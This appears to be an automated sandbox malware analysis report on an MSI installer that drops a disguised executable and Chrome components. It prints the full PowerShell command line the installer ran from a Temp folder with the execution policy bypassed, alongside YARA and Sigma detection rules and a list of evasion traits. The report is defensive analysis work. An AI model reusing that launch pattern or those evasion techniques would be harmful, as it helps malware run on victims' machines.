Edit tour

Windows Analysis Report
Br_i421i2-2481-125_754864.msi

Overview

General Information

Sample name:	Br_i421i2-2481-125_754864.msi
Analysis ID:	1447349
MD5:	dc2ff54f9664f90f09004b367fbdca10
SHA1:	e0dd52a75514bae7e68396e953eab1a62e567aa5
SHA256:	0cc32738dd2dbf5d0c128a9029783b6daa691c999683feae8b9caa4c0805eaad
Tags:	msi
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected MalDoc

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Writes many files with high entropy

Checks for available system drives (often done to infect USB drives)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious MsiExec Embedding Parent

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7456 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Br_i421i2-2481-125_754864.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7488 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7572 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B MD5: 9D09DC1EDA745A5F87553048E57620CF)

powershell.exe (PID: 7712 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WebExperienceHostApp.exe (PID: 7204 cmdline: "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe" MD5: 53AB9B8198E8AD8D3A043F40E72B1AB1)

chrome.exe (PID: 2500 cmdline: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe MD5: 1913EFB2223B24D2A47FAD0A1AAD8F19)

WerFault.exe (PID: 7444 cmdline: C:\Windows\system32\WerFault.exe -u -p 2500 -s 580 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Br_i421i2-2481-125_754864.msi	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Br_i421i2-2481-125_754864.msi	JoeSecurity_MalDoc	Yara detected MalDoc	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Windows\Installer\MSI3E49.tmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Config.Msi\4b3b29.rbs	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Windows\Installer\4b3b27.msi	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Windows\Installer\4b3b27.msi	JoeSecurity_MalDoc	Yara detected MalDoc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 7712	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_7712.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7572, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7712, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7572, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7712, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7572, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7712, ProcessName: powershell.exe

Sigma detected: Suspicious MsiExec Embedding Parent

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7572, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7712, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdb source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\initialexe\chrome.exe.pdb source: WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: Br_i421i2-2481-125_754864.msi, MSI3E49.tmp.1.dr, 4b3b29.rbs.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: Br_i421i2-2481-125_754864.msi, MSI3E49.tmp.1.dr, 4b3b29.rbs.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\msvcp140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WebExperienceHostApp.pdb&& source: WebExperienceHostApp.exe, 00000008.00000000.2006121013.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: WebExperienceHostApp.pdb source: WebExperienceHostApp.exe, 00000008.00000000.2006121013.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcruntime140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mrt100_app.pdb source: mrt100_app.dll.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdbGCTL source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\vulkan-1.dll.pdb source: WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: B.pdb source: external_extensions_0000x.57.8.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Br_i421i2-2481-125_754864.msi, 4b3b27.msi.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FFE007AA230 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,

8_2_00007FFE007AA230

Networking

Yara detected MalDoc

Source: Yara match	File source: Br_i421i2-2481-125_754864.msi, type: SAMPLE
Source: Yara match	File source: C:\Windows\Installer\4b3b27.msi, type: DROPPED

Source: powershell.exe, 00000003.00000002.2007551719.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blob.cpq22prdstr01a.store.core.windows.net
Source: powershell.exe, 00000003.00000002.2007551719.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bost.blob.core.windows.net
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000003.00000002.2011514359.0000000006B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microQ
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000003.00000002.2007551719.0000000004706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: WebExperienceHostApp.exe, 00000008.00000002.2062560294.0000000065F52000.00000020.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9DE3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/03
Source: WebExperienceHostApp.exe, 00000008.00000002.2062560294.0000000065F52000.00000020.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 00000003.00000002.2007551719.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc1321
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4648
Source: powershell.exe, 00000003.00000002.2007551719.0000000004706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: xmpp.dll.1.dr	String found in binary or memory: http://www.apachefriends.org/f/viewforum.php?f=16
Source: xmpp.dll.1.dr	String found in binary or memory: http://www.apachefriends.org/f/viewforum.php?f=4
Source: WebExperienceHostApp.exe, 00000008.00000002.2062560294.0000000065F52000.00000020.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: http://www.borland.com/namespaces/Types
Source: WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9DE3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.borland.com/namespaces/Types03
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf
Source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF492510000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924DD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdf
Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.schneier.com/paper-blowfish-fse.html
